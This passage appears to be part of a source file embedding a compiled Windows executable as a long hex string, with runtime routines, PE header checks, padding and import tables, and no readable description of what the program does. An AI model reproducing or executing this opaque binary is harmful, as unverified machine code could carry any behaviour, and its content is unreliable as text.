'fff83c40ce8ec92ffff6a225e8930e87392ffffe971ffffff558bec6a00ff' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'7d883da008bca8bd38bd98bc88bc65ec210005633f6ffb6606e4200ff15f4' \
'a141008986606e420083c60483fe2872e65ec3ccccccccccccccccccccccc' \
'c558bec8b4508538b483c03c8560fb741140fb7590683c01833d203c15785' \
'db741b8b7d0c8b700c3bfe72098b480803ce3bf9720a4283c0283bd372e83' \
'3c05f5e5b5dc3cccccccccccccccccccccccccc558bec6afe688030420068' \
'c01c410064a1000000005083ec08535657a1606342003145f833c5508d45f' \
'064a3000000008965e8c745fc000000006800004000e87c00000083c40485' \
'c074548b45082d00004000506800004000e852ffffff83c40885c0743a8b4' \
'024c1e81ff7d083e001c745fcfeffffff8b4df064890d00000000595f5e5b' \
'8be55dc38b45ec8b0033c98138050000c00f94c18bc1c38b65e8c745fcfef' \
'fffff33c08b4df064890d00000000595f5e5b8be55dc3cccccccccccc558b' \
'ec8b4508b94d5a0000663908740433c05dc38b483c03c833c081395045000' \
'0750cba0b010000663951180f94c05dc3558bec568b75085783cfff85f675' \
'14e8ac90ffffc70016000000e83290ffff0bc7eb45f6460c83743956e8285' \
'2ffff568bf8e8db0f000056e8ef95ffff50e86b0e000083c41085c0790583' \
'cfffeb13837e1c00740dff761ce8a870ffff83661c005983660c008bc75f5' \
'e5dc36a0c68a0304200e827a3ffff83cfff897de433c08b750885f60f95c0' \
'85c07518e82f90ffffc70016000000e8b58fffff8bc7e841a3ffffc3f6460' \
'c40740683660c00ebec56e88550ffff598365fc0056e83fffffff598bf889' \
'7de4c745fcfeffffffe808000000ebc78b75088b7de456e8c950ffff59c35' \
'58bec568b750885f6741b6ae033d258f7f63b450c730fe8c18fffffc7000c' \
'00000033c0eb510faf750c85f675014633c983fee07715566a08ff359c7d4' \
'200ff151ca141008bc885c9752a833df87f420000741456e88091ffff5985' \
'c075d08b451085c074bcebb48b451085c07406c7000c0000008bc15e5dc3f' \
'f3508804200ff15f8a14100c3558bec8b4508a300804200a304804200a308' \
'804200a30c8042005dc36a2468c0304200e80da2ffff33db895de033ff897' \
'dd88b750883fe0b7f5074158bc66a02592bc174222bc174082bc1745e2bc1' \
'7548e8488affff8bf8897dd885ff751683c8ffe964010000c745e40080420' \
'0a100804200eb5eff775c56e853010000595983c0088945e48b00eb568bc6' \
'83e80f743683e8067423487412e8b88effffc70016000000e83e8effffebb' \
'4c745e408804200a108804200eb1ac745e404804200a104804200eb0cc745' \
'e40c804200a10c80420033db43895de050ff15f8a141008945dc83f8010f8' \
'4dd00000085c075076a03e8e9a9ffff85db74086a00e873a6ffff598365fc' \
'0083fe08740a83fe0b740583fe04751c8b47608945d08367600083fe08754' \
'18b47648945ccc747648c00000083fe08752f8b0d68bd41008bd18955d4a1' \
'6cbd410003c13bd07d268bca6bc90c8b475c8364010800428955d48b0d68b' \
'd4100ebdc6a00ff15f4a141008b4de48901c745fcfeffffffe81800000083' \
'fe087520ff776456ff55dc59eb1a8b75088b5de08b7dd885db74086a00e83' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'0c3bca730939710475048bc1eb0233c05e5dc36a0868e0304200e81ca0fff' \
'f8b7d088bc7c1f8058bf783e61fc1e606033485e0744200837e080075306a' \
'0ae838a5ffff598365fc00837e0800751268a00f00008d460c50ff15aca14' \
'100ff4608c745fcfeffffffe82a0000008bc7c1f80583e71fc1e7068b0485' \
'e074420083c00c03c750ff15e8a0410033c040e8ee9fffffc38b7d086a0ae' \
'842a6ffff59c3558bec8b4508565785c078603b05d080420073588bf8c1ff' \
'058bf08b0cbde074420083e61fc1e606f6440e0401743d833c0eff7437833' \
'd6877420001751f33c92bc17410487408487513516af4eb08516af5eb0351' \
'6af6ff15a0a041008b04bde0744200830c06ff33c0eb16e84c8cffffc7000' \
'9000000e80d8cffff83200083c8ff5f5e5dc3558bec8b4d0883f9fe7515e8' \
'f38bffff832000e81f8cffffc70009000000eb4285c978263b0dd08042007' \
'31e8bc1c1f80583e11f8b0485e0744200c1e106f64408040174058b04085d' \
'c3e8b48bffff832000e8e08bffffc70009000000e8668bffff83c8ff5dc35' \
'58bec8b4d088bc183e11fc1f805c1e1068b0485e074420083c10c03c150ff' \
'15eca041005dc36a186800314200e87d9effff83ceff8975d88975dc8b7d0' \
'883fffe7518e8548bffff832000e8808bffffc70009000000e9bd00000085' \
'ff0f889d0000003b3dd08042000f83910000008bc7c1f8058945e48bdf83e' \
'31fc1e3068b0485e07442000fbe44180483e001747057e8f1fdffff598365' \
'fc008b45e48b0485e0744200f6441804017418ff7514ff7510ff750c57e86' \
'700000083c4108bf08bdaeb15e8078bffffc70009000000e8c88affff8320' \
'008bde8975d8895ddcc745fcfeffffffe80d0000008bd3eb2b8b7d088b5dd' \
'c8b75d857e802ffffff59c3e8978affff832000e8c38affffc70009000000' \
'e8498affff8bd68bc6e8d39dffffc3558bec5151568b75085756e867fefff' \
'f83cfff593bc77511e8918affffc700090000008bc78bd7eb44ff75148d4d' \
'f851ff7510ff750c50ff152ca1410085c0750fff15c0a0410050e8408afff' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'ffff8b45f083b8a80000000075158b4d0885c974060fb60666890133ff47e' \
'9840000008d45f0500fb60650e8d241ffff595985c074408b7df0837f7401' \
'7e273b5f747c2533c03945080f95c050ff7508ff7774566a09ff7704ff15a' \
'4a141008b7df085c0750b3b5f74722e807e010074288b7f74eb3133c03945' \
'080f95c033ff4750ff75088b45f057566a09ff7004ff15a4a1410085c0750' \
'ee86889ffff83cfffc7002a000000807dfc0074078b4df8836170fd8bc75f' \
'e936ffffff558bec6a00ff7510ff750cff7508e8fafeffff83c4105dc3558' \
'bec51a1a06e420083f8fe750ae8b8080000a1a06e420083f8ff7507b8ffff' \
'0000c9c36a008d4dfc516a018d4d085150ff15b0a1410085c074e2668b450' \
'8c9c3558bec83ec10a16063420033c58945fc5356578b7d0cf6470c400f85' \
'3601000057e8378effff59bb506c420083f8ff742e57e8268effff5983f8f' \
'e742257e81a8effff8bf057c1fe05e80f8effff83e01f59c1e0060304b5e0' \
'74420059eb028bc38a4024247f3c020f84e800000057e8e98dffff5983f8f' \
'f742e57e8dd8dffff5983f8fe742257e8d18dffff8bf057c1fe05e8c68dff' \
'ff83e01f59c1e0060304b5e074420059eb028bc38a4024247f3c010f849f0' \
'0000057e8a08dffff5983f8ff742e57e8948dffff5983f8fe742257e8888d' \
'ffff8bf057c1fe05e87d8dffff8bd883e31f59c1e306031cb5e074420059f' \
'6430480745fff75088d45f46a05508d45f050e80bf5ffff83c41085c07407' \
'b8ffff0000eb5f33f63975f07e32ff4f0478128b0f8a4435f488018b070fb' \
'608408907eb100fbe4435f45750e867beffff59598bc883f9ff74c6463b75' \
'f07cce668b4508eb20834704fe780d8b0f8b4508668901830702eb0d0fb74' \
'5085750e83507000059598b4dfc5f5e33cd5be8463effffc9c3558becff05' \
'7874420056be0010000056e839a1ffff598b4d0889410885c0740983490c0' \
'8897118eb1183490c048d4114894108c74118020000008b41088361040089' \
'015e5dc3558bec83ec24a16063420033c58945fc8b4508538b1df4a141005' \
'6578945e48b450c33ff578945e0ffd38bf08975e8e8a889ffff8945ec393d' \
'148042000f85ae0000006800080000576804f84100ff1508a241008bf085f' \
'67524ff15c0a0410083f8570f85680100006804f84100ff1528a141008bf0' \
'85f60f8453010000681cf8410056ff15a4a0410085c00f843f01000050ffd' \
'36828f8410056a314804200ff15a4a0410050ffd36838f8410056a3188042' \
'00ff15a4a0410050ffd3684cf8410056a31c804200ff15a4a0410050ffd3a' \
'32480420085c074146868f8410056ff15a4a0410050ffd3a3208042008b75' \
'e8ff15e4a1410085c0741b8b45e485c0740750ff15b4a14100397dec741d6' \
'a0458e9bd000000397dec7410ff3514804200ff15f8a141006a03ebe5a120' \
'8042008b1df8a141003bc6744f393524804200744750ffd3ff35248042008' \
'945ecffd38b4dec8945e885c9742f85c0742bffd185c0741a8d4ddc516a0c' \
'8d4df0516a0150ff55e885c07406f645f801750b8b751081ce00002000eb3' \
'0a1188042003bc6742450ffd385c0741dffd08bf885ff7415a11c8042003b' \
'c6740c50ffd385c0740557ffd08bf88b7510ff3514804200ffd385c0740c5' \
'6ff75e0ff75e457ffd0eb0233c08b4dfc5f5e33cd5be81e3cffffc9c3558b' \
'ec668b45086a3059663bc10f82870100006683f83a73070fb7c02bc15dc3b' \
'<KEY>' \
'<KEY>' \
'bc172e3ba66090000663bc20f822b0100008d4a0a663bc172cd8d5176663b' \
'c20f82170100008d4a0a663bc172b98d5176663bc20f82030100008d4a0a6' \
'63bc172a58d5176663bc20f82ef0000008d4a0a663bc172918d5176663bc2' \
'0f82db0000008d4a0a663bc10f8279ffffffba660c0000663bc20f82c1000' \
'0008d4a0a663bc10f825fffffff8d5176663bc20f82a90000008d4a0a663b' \
'c10f8247ffffff8d5176663bc20f82910000008d4a0a663bc10f822ffffff' \
'fba500e0000663bc2727b8d4a0a663bc10f8219ffffff8d5176663bc27267' \
'<KEY>' \
'fffba40100000663bc2723d8d4a0a663bc10f82dbfeffffbae0170000663b' \
'c272278d4a0a663bc10f82c5feffff83c230663bc2721383c130eb05b91af' \
'f0000663bc10f82aafeffff83c8ff5dc3cccccccc8b4424088b4c24100bc8' \
'8b4c240c75098b442404f7e1c2100053f7e18bd88b442408f764241403d88' \
'b442408f7e103d35bc21000cccccccccccccccccccccccc558bec53565755' \
'6a006a006838864100ff7508e8680400005d5f5e5b8be55dc38b4c2404f74' \
'10406000000b80100000074328b4424148b48fc33c8e8f939ffff558b6810' \
'8b5028528b502452e81400000083c4085d8b4424088b5424108902b803000' \
'000c35356578b44241055506afe684086410064ff3500000000a160634200' \
'33c4508d44240464a3000000008b4424288b58088b700c83feff743a837c2' \
'42cff74063b74242c762d8d34768b0cb3894c240c89480c837cb304007517' \
'68010100008b44b308e8490000008b44b308e85f000000ebb78b4c2404648' \
'90d0000000083c4185f5e5bc333c0648b0d00000000817904408641007510' \
'8b510c8b520c3951087505b801000000c35351bb906e4200eb0b5351bb906' \
'e42008b4c240c894b08894304896b0c55515058595d595bc20400ffd0c355' \
'8bec8b4508f7d81bc083e0015dc36a02e8d39cffff59c36a106820314200e' \
'8e594ffff8b750883fefe7518e8c581ffff832000e8f181ffffc700090000' \
'00e99500000085f678793b35d080420073718bdec1fb058bfe83e71fc1e70' \
'68b049de07442000fbe44380483e001745356e86df4ffff598365fc008b04' \
'9de0744200f644380401740b56e855000000598bf8eb0ee89381ffffc7000' \
'900000083cfff897de4c745fcfeffffffe80a0000008bc7eb298b75088b7d' \
'e456e89bf5ffff59c3e83081ffff832000e85c81ffffc70009000000e8e28' \
'0ffff83c8ffe86d94ffffc3558bec56578b7d0857e803f5ffff5983f8ff74' \
'50a1e074420083ff017509f6808400000001750b83ff02751cf6404401741' \
'66a02e8d8f4ffff6a018bf0e8cff4ffff59593bc6741c57e8c3f4ffff5950' \
'ff15c4a0410085c0750aff15c0a041008bf0eb0233f657e81ff4ffff598bc' \
'fc1f90583e71f8b0c8de0744200c1e706c64439040085f6740c56e89980ff' \
'<KEY>' \
'41aff7608e8d860ffff81660cf7fbffff33c05989068946088946045e5dc3' \
'a1a06e420083f8ff740c83f8fe740750ff15c4a04100c333c050506a03506' \
'a0368000000406880f84100ff1514a14100a3a06e4200c3558bec51568b75' \
'0c5756e8a585ffff598b4e0c8bf8f6c1827519e82980ffffc700090000008' \
'34e0c20b8ffff0000e929010000f6c140740de80b80ffffc70022000000eb' \
'e05333dbf6c1017413895e04f6c110747f8b460883e1fe8906894e0c8b460' \
'c83e0ef83c80289460c895e04a90c010000752ae84240ffff83c0203bf074' \
'0ce83640ffff83c0403bf0750b57e861ebffff5985c0750756e83df8ffff5' \
'9f7460c08010000747d8b56088b0e8d420289068b46182bca83e802894d0c' \
'89460485c97e17515257e8ca9dffff83c40c8bd8eb4783c920894e0ceb758' \
'3ffff741b83fffe74168bcf8bc783e11fc1f805c1e106030c85e0744200eb' \
'05b9506c4200f641042074146a02535357e88df3ffff23c283c41083f8ff7' \
'<KEY>' \
'000000e8579dffff8b4d0883c40c8bd83b5d0c740b834e0c20b8ffff0000e' \
'b030fb7c15b5f5ec9c3ccff25e8a14100ff251ca241008b5424088d420c8b' \
'4aec33c8e8a235ffffb800304200e9a16cffffff75e8ff75e4e8cb90feff5' \
'959c38b4de4e93894feff8b5424088d420c8b4ae033c8e87135ffffb87031' \
'4200e9706cffff8b5424088d420c8b4ae033c8e85635ffffb8d8314200e95' \
'56cffff8b4df083c104e9f793feff8b4df083c108e94085feff8b5424088d' \
'420c8b4aec33c8e82535ffffb8f8324200e9246cffff8d4ddce9c993feff8' \
'd4de8e9c193feff8d4dcce9b993feff8d4dcce9d488feff8d4de4e9a993fe' \
'ff8d4dd4e9a193feff8d4dc4e99993feff8d4dc4e9b488feff8d4d08e9899' \
'3feff8d4dc4e98193feff8d4dc4e99c88feff8d4d08e97193feff8d4dc4e9' \
'6993feff8d4dc4e98488feff8b5424088d420c8b4ab033c8e89a34ffffb86' \
'0324200e9996bffff8d4d0ce93e93feff8b5424088d420c8b4aec33c8e877' \
'34ffffb830324200e9766bffff8d4de0e91b93feff8d4ddce91393feff8d4' \
'dd8e90b93feff8b5424088d420c8b4ab433c8e84434ffffb8b8334200e943' \
'6bffff8d4df0e9e892feff8d4de8e9e092feff8d4de4e9d892feff8d4de4e' \
'9d092feff8d4de4e9c892feff8d4de4e9c092feff8d4de4e9b892feff8b54' \
'24088d420c8b4ac033c8e8f133ffffb820344200e9f06affff8d8dd0fefff' \
'fe921a2feff8b5424088d829cfeffff8b8a98feffff33c8e8c533ffff83c0' \
'<KEY>' \
'433c8e89d33ffffb82c334200e99c6affff8d4d08e94192feff8d4de8e939' \
'92feff8b5424088d420c8b4ae033c8e87233ffffb87c344200e9716affff8' \
'b5424088d420c8b4ae833c8e85733ffffb804364200e9566affffff7508ff' \
'75e8e8808efeff5959c38b5424088d420c8b4ae433c8e82e33ffffb8a4354' \
'200e92d6affffff7508ff75f0e8578efeff5959c38b5424088d420c8b4aec' \
'33c8e80533ffffb85c364200e9046affff8b4df0e9a991feff8b4df083c10' \
'4e99e91feff8b5424088d420c8b4aec33c8e8d732ffffb818354200e9d669' \
'ffff8d4db0e97b91feff8b5424088d420c8b4aa833c8e8b432ffff8b4afc3' \
'3c8e8aa32ffffb82c374200e9a969ffff8d8dc8f7ffffe94b91feff8d8dcc' \
'f7ffffe94091feff8d8dccf7ffffe93591feff8b5424088d420c8b8ab8f7f' \
'fff33c8e86b32ffff8b4afc33c8e86132ffffb858374200e96069ffff8d8d' \
'9cf7ffffe954c1feff8d8dc8f7ffffe9f790feff8b85b8f7ffff83e0010f8' \
'41200000083a5b8f7fffffe8d8dacf7ffffe9d690feffc38d8da8f7ffffe9' \
'ca90feff8b85b8f7ffff83e0020f841200000083a5b8f7fffffd8d8db0f7f' \
'fffe9a990feffc38b5424088d420c8b8a98f7ffff33c8e8de31ffff8b4afc' \
'33c8e8d431ffffb8e0364200e9d368ffff8d4dd0e99b85feff8d4dd0e9938' \
'5feff8b5424088d420c8b4acc33c8e8a931ffffb8b0344200e9a868ffff8b' \
'5424088d420c8b4ae433c8e88e31ffffb888364200e98d68ffff8b5424088' \
'd420c8b4ae033c8e87331ffffb84c354200e97268ffffff7508ff75f0e89c' \
'8cfeff5959c3ff7508ff75f0e88e8cfeff5959c38b5424088d420c8b4aec3' \
'3c8e83c31ffffb8e4344200e93b68ffff8d8d20ffffffe94381feff8d8d48' \
'ffffffe98facfeff8d8d0cffffffe9c78ffeff8d8d0cffffffe9bc8ffeff8' \
'd8d0cffffffe9b18ffeff8d8d38ffffffe9a68ffeff8d8d3cffffffe99b8f' \
'feff8d8d44ffffffe9908ffeff8d8d1cffffffe9858ffeff8d8d1cffffffe' \
'97a8ffeff8b5424088d820cffffff8b8a08ffffff33c8e8ad30ffffb89837' \
'4200e9ac67ffff8d4de4e9518ffeff8d4de0e9498ffeff8d4de8e9418ffef' \
'f8d4de4e9398ffeff8d4dece9318ffeff8d4df0e9298ffeff8d4de0e9218f' \
'feff8d4de4e9198ffeff8d4dece9118ffeff8b5424088d420c8b4adc33c8e' \
'84a30ffffb848384200e94967ffff8d8dfcfbffffe9eb8efeff8d8de4fbff' \
'ffe94680feff8d8d00fcffffe9d58efeff8d8df8fbffffe9ca8efeff8d8dd' \
'cfbffffe9bf8efeff8d8df8fbffffe9b48efeff8d8db0fbffffe9cc83feff' \
'8d8df8fbffffe99e8efeff8d8d00fcffffe9938efeff8d8ddcfbffffe9888' \
'efeff8d8d00fcffffe97d8efeff8d8db0fbffffe99583feff8d8d00fcffff' \
'e9678efeff8d8dd0fbffffe95c8efeff8d8d00fcffffe9518efeff8d8dd0f' \
'bffffe9468efeff8d8db0fbffffe95e83feff8b5424088d420c8b8aacfbff' \
'ff33c8e8712fffff8b4afc33c8e8672fffffb8c8384200e96666ffff8d4de' \
'ce90b8efeff8d4ddce9038efeff8b5424088d420c8b4ad833c8e83c2fffff' \
'b810384200e93b66ffff8d8de05fffffe9dd8dfeff8b5424088d420c8b8ac' \
'c5fffff33c8e8132fffff8b4af833c8e8092fffffb878394200e90866ffff' \
'8b45ec83e0010f840c0000008365ecfe8b4de4e99d8dfeffc38d4dcce9b0e' \
'7feff8d4dd8e9a8e7feff8d4dc0e9a0e7feff8b5424088d420c8b4abc33c8' \
'e8bd2effffb8d8394200e9bc65ffff8d4df0e9618dfeff8b5424088d420c8' \
'b4aec33c8e89a2effffb8683a4200e99965ffff8d4de0e93e8dfeff8d4de4' \
'e9368dfeff8d4dece92e8dfeff8b45d483e0010f840c0000008365d4fe8d4' \
'dece9168dfeffc38d4dd0e90d8dfeff8b5424088d420c8b4acc33c8e8462e' \
'ffffb81c3a4200e94565ffff8d4df0e9ea8cfeff8d4dace9e28cfeff8d4dc' \
'ce9da8cfeff8d4dd8e9d28cfeff8d4dd8e9ca8cfeff8d4dd0e9c28cfeff8b' \
'45e483e0010f840c0000008365e4fe8d4dd0e9aa8cfeffc38b45e483e0020' \
'f840c0000008365e4fd8d4dd0e9918cfeffc38d4de0e9888cfeff8d4de0e9' \
'808cfeff8d4de0e9788cfeff8b5424088d420c8b8a34ffffff33c8e8ae2df' \
'fffb8983a4200e9ad64ffff8b5424088d420c8b4ae033c8e8932dffffb870' \
'3b4200e99264ffff8b5424088d420c8b4ae833c8e8782dffffb8183b4200e' \
'97764ffff8b4df0e91c8cfeff8b5424088d420c8b4aec33c8e8552dffffb8' \
'f43b4200e95464ffff8b45f083e0010f840c0000008365f0fe8b4dece9e98' \
'<KEY>' \
'8d8dd8fbffffe9c28bfeff8d8ddcfbffffe9b78bfeff8d8dd0fbffffe9ac8' \
'<KEY>' \
'ffffb84c3d4200e9d763ffff8d8dccfbffffe9798bfeff8d8dc0fbffffe96' \
'e8bfeff8d8dc8fbffffe9638bfeff8d8ddcfbffffe9588bfeff8d8dd4fbff' \
'ffe94d8bfeff8d8dd8fbffffe9428bfeff8d8dbcfbffffe9378bfeff8d8dd' \
'8fbffffe92c8bfeff8b5424088d420c8b8ab8fbffff33c8e8622cffff8b4a' \
'fc33c8e8582cffffb8f03e4200e95763ffff8d8dccfffeffe9f98afeff8d8' \
'de4fffeffe9ee8afeff8b85d4fffeff83e0010f841200000083a5d4fffeff' \
'fe8d8de4fffeffe9cd8afeffc38b85d4fffeff83e0020f841200000083a5d' \
'4fffefffd8d8de4fffeffe9ab8afeffc38d8ddcfffeffe99f8afeff8b85d4' \
'fffeff83e0040f841200000083a5d4fffefffb8d8ddcfffeffe97e8afeffc' \
'38d8de0fffeffe9728afeff8b5424088d420c8b8aa4fffeff33c8e8a82bff' \
'ff8b4afc33c8e89e2bffffb8703f4200e99d62ffff8d8d1cf8ffffe93f8af' \
'eff8d8d18f8ffffe9348afeff8b5424088d420c8b8a0cf8ffff33c8e86a2b' \
'ffff8b4afc33c8e8602bffffb8183d4200e95f62ffff8d8dd8fbffffe9018' \
'afeff8d8db0fbffffe9f689feff8d8d9cfbffffe9eb89feff8d8da4fbffff' \
'e9e089feff8d8dbcfbffffe9d589feff8d8da8fbffffe9ca89feff8d8db8f' \
'bffffe9bf89feff8d8db4fbffffe9b489feff8d8dacfbffffe9a989feff8b' \
'5424088d420c8b8a98fbffff33c8e8df2affff8b4afc33c8e8d52affffb82' \
'03c4200e9d461ffff8d4de8e97989feff8d4df0e97189feff8d4ddce96989' \
'feff8d4de0e96189feff8d4de0e95989feff8d4ddce95189feff8b5424088' \
'd420c8b4ad433c8e88a2affffb8883d4200e98961ffff8d4ddce92e89feff' \
'8d4df0e92689feff8d4de4e91e89feff8d4d8ce9afb8feff8d4db4e9a7b8f' \
'eff8d4de0e90689feff8b5424088d420c8b4a8833c8e83f2affffb8103e42' \
'00e93e61ffff8d8ddcbfffffe9e088feff8d8dd4bfffffe9d588feff8d8db' \
'4bfffffe9ca88feff8d8de0bfffffe9bf88feff8d8de0bfffffe9b488feff' \
'8d8de8bfffffe9a988feff8d8de0bfffffe99e88feff8d8dd4bfffffe9938' \
'8feff8d8de8bfffffe98888feff8d8de8bfffffe97d88feff8b5424088d42' \
'0c8b8aacbfffff33c8e8b329ffff8b4afc33c8e8a929ffffb8903c4200e9a' \
'860ffff8d4d88e9e6b7feff8d4db0e9deb7feff8b5424088d420c8b4a8433' \
'c8e87e29ffffb8dc3d4200e97d60ffff8d8d30ffffffe9b8b7feff8d8d58f' \
'fffffe9adb7feff8d4d80e96b0effff8d4dcce90488feff8d4dcce9fc87fe' \
'ff8d4dc8e9f487feff8d4dcce9ec87feff8b5424088d420c8b8a2cffffff3' \
'3c8e82229ffff8b4afc33c8e81829ffffb8643e4200e91760ffff8d4dace9' \
'bc87feff8b5424088d420c8b4a9c33c8e8f528ffff8b4afc33c8e8eb28fff' \
'fb8c03e4200e9ea5fffff8d8d98bfffffe925b7feff8d8dc0bfffffe91ab7' \
'feff8b5424088d828cbfffff8b8a88bfffff33c8e8b428ffff83c00c8b4af' \
'833c8e8a728ffffb808404200e9a65fffff8d8dccfbffffe94887feff8d8d' \
'd0fbffffe93d87feff8d8dc8fbffffe93287feff8b5424088d82c4fbffff8' \
'b8ac0fbffff33c8e86528ffff83c00c8b4af833c8e85828ffffb8cc3f4200' \
'e9575fffff8d4dd8e9fc86feff8d4dd8e9f486feff8d4dd0e9ec86feff8b5' \
'424088d420c8b4ac433c8e82528ffff8b4afc33c8e81b28ffffb8d0404200' \
'e91a5fffff8b85dcfbffff83e0010f841200000083a5dcfbfffffe8b8dd8f' \
'bffffe9a686feffc38b5424088d420c8b8ad0fbffff33c8e8db27ffff8b4a' \
'fc33c8e8d127ffffb8a4404200e9d05effff8b45f083e0010f840c0000008' \
'365f0fe8b4de8e96586feffc38d4dece95c86feff8b5424088d420c8b4ae4' \
'33c8e89527ffffb83c404200e9945effff8d4df0e93986feff8d4dece9318' \
'6feff8b5424088d420c8b4ae833c8e86a27ffffb884414200e9695effff8d' \
'4df0e90e86feff8b5424088d420c8b4adc33c8e84727ffffb8b8414200e94' \
'65effff8d4de4e9eb85feff8d4de8e9e385feff8b5424088d420c8b4adc33' \
'c8e81c27ffffb870404200e91b5effff8d4de8e9c085feff8d4de4e9b885f' \
'eff8d4dece9b085feff8d4dece9a885feff8b5424088d420c8b4adc33c8e8' \
'e126ffffb80c414200e9e05dffff6800604200b974804200e8a085feff683' \
'c9a4100e8eb3effff59c3e8e47efeff684a9a4100a378804200e8d53effff' \
'59c368659a4100e8c93effff59c3685a9a4100e8bd3effff59c3684f9a410' \
'0e8b13effff59c36800604200b984804200e84b85feff68709a4100e8963e' \
'ffff59c3ff1520a14100687e9a4100c705c070420048a34100a3c4704200c' \
'605c870420000e86e3effff59c368889a4100e8623effff59c3b9cc704200' \
'e84c23ffff68939a4100e84c3effff59c38b0d748042008d49f0e91085fef' \
'fe99a04ffffc705b0704200c8a34100c3c705b8704200c8a34100c3c705b4' \
'704200c8a34100c38b0d848042008d49f0e9dc84feffb9c0704200e93a21f' \
'fffc705006042005ca34100c3b9cc704200e94023ffff0000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'00000000000000000000000344902001c49020004490200e6480200c84802' \
'00b4480200a4480200924802007c4802006c4802005448020042480200324' \
'802002048020006480200ec470200d4470200ba470200aa47020098470200' \
'7a4702006c470200dc460200fc460200184702002e4702004447020058470' \
'20000000000105102001a5102002c510200405102004e5102005c51020072' \
'510200825102009c510200b6510200d0510200e0510200bc4b02005a49020' \
'06c4902007c4902008c4902009c490200ae490200c2490200d2490200e049' \
'0200f4490200044a0200144a0200204a02003a4a0200584a0200764a02009' \
'24a0200aa4a0200c24a0200da4a0200ec4a0200fa4a0200104b0200184b02' \
'00244b0200384b02004a4b02005c4b02006a4b0200824b02008e4b0200a04' \
'b0200ac4b0200f0510200ce4b0200e24b0200fa4b02000c4c0200204c0200' \
'364c02004c4c02006a4c0200864c02009e4c0200ac4c0200bc4c0200d04c0' \
'200e24c0200f44c02000e4d0200284d02003c4d02004c4d0200584d020066' \
'4d0200724d0200884d02009e4d0200b84d0200ce4d0200e24d0200fe4d020' \
'0164e0200224e0200384e02004e4e0200764e0200864e02009c4e0200ae4e' \
'0200c44e0200d64e020002510200f4500200e8500200f24e0200004f02000' \
'e4f02001a4f02002c4f0200404f02005c4f02007c4f0200904f0200a04f02' \
'00b04f0200c04f0200d64f0200e44f0200f64f020010500200285002003e5' \
'002004c500200585002006a50020074500200805002008c5002009e500200' \
'ae500200ca50020000000000944602007046020080460200ba460200a4460' \
'200000000009645020086450200000000002046020000000000fa450200e0' \
'450200cc450200b8450200000000005245020038450200684502000000000' \
'03a460200524602000000000000000000f29941001a9a4100269a41008299' \
'41009d994100b3994100bf994100cb994100d799410000000000000000005' \
'cc9400061d74000e9fb40007e0641001554410000000000000000002c0b41' \
'00dc30410003894100cfc9400000000000000000000000000000000000000' \
'0000000000000a9dded54000000000200000042000000f0250200f0150200' \
'00000000a9dded54000000000c00000010000000342602003416020085bc4' \
'000a9bc400046bd4000d2bc4000febb40001dbc40009dbc4000e7bc4000c4' \
'bc40009abc4000debb4000282849d33841d44fb3ecdb99135eae867826420' \
'026bf40008bf2400062616420616c6c6f636174696f6e0000c42642004bbf' \
'40008bf24000102742004bbf40008bf24000602742004bbf40008bf240008' \
'0294200aaad400003e8400003e84000e9ad40001aae4000fbad4000342942' \
'00aaad400037ae40003dae4000e9ad40001aae4000fbad400094294200aaa' \
'd400068ae40006eae4000e9ad40001aae4000fbad4000dc294200aaad4000' \
'9dae4000a3ae4000ceae40001aae4000fbad4000000000000500000008a94' \
'100b70000001ca941001400000028a941006f00000038a94100aa0000004c' \
'a941008e0000004ca941005200000008a94100f303000064a94100f403000' \
'064a94100f503000064a941001000000008a941003700000028a941006409' \
'00004ca941009100000070a941000b01000084a941007000000098a941005' \
'00000001ca9410002000000aca941002700000098a941000c00000008a941' \
'000f00000028a9410001000000c8a941000600000084a941007b00000084a' \
'9410021000000e0a94100d4000000e0a941008300000084a94100e6030000' \
'08a9410008000000f4a941001500000008aa41001100000028aa41006e000' \
'00064a94100610900004ca94100e30300003caa41000e000000f4a9410003' \
'000000aca941001e00000064a94100d504000008aa41001900000064a9410' \
'02000000008a941000400000050aa41001d00000064a941001300000008a9' \
'41001d27000064aa41004027000078aa41004127000088aa41003f270000a' \
'0aa410035270000c0aa410019270000e0aa410045270000f4aa41004d2700' \
'0008ab4100462700001cab41003727000030ab41001e27000050ab4100512' \
'700005cab41003427000070ab41001427000088ab41002627000094ab4100' \
'48270000a8ab410028270000bcab410038270000d0ab41004f270000e0ab4' \
'10042270000f4ab41004427000004ac41004327000014ac41004727000028' \
'ac41003a27000038ac4100492700004cac4100362700005cac41003d27000' \
'06cac41003b27000084ac4100392700009cac41004c270000b0ac41003327' \
'0000bcac4100000000000000000066000000d4ac410064000000f4ac41006' \
'500000004ad4100710000001cad41000700000030ad41002100000048ad41' \
'000e00000060ad4100090000006cad41006800000080ad4100200000008ca' \
'd41006a00000098ad410067000000acad41006b000000ccad41006c000000' \
'e0ad41001200000028aa41006d000000f4ad4100100000004ca9410029000' \
'00070a941000800000014ae4100110000001ca941001b0000002cae410026' \
'00000038a9410028000000c8a941006e0000003cae41006f00000050ae410' \
'02a00000064ae4100190000007cae41000400000088ab41001600000084a9' \
'41001d000000a0ae41000500000064a9410015000000b0ae410073000000c' \
'0ae410074000000d0ae410075000000e0ae410076000000f0ae4100770000' \
'0004af41000a00000014af41007900000028af410027000000e0a94100780' \
'0000030af41007a00000048af41007b00000054af41001c00000098a94100' \
'7c00000068af4100060000007caf41001300000028a9410002000000aca94' \
'1000300000098af410014000000a8af410080000000b8af41007d000000c8' \
'af41007e000000d8af41000c000000f4a9410081000000e8af41006900000' \
'03caa410070000000f8af41000100000010b041008200000028b041008c00' \
'000040b041008500000058b041000d00000008a941008600000064b041008' \
'700000074b041001e0000008cb0410024000000a4b041000b00000008aa41' \
'0022000000c4b041007f000000d8b0410089000000f0b041008b00000000b' \
'141008a00000010b14100170000001cb141001800000050aa41001f000000' \
'3cb14100720000004cb14100840000006cb14100880000007cb1410000000' \
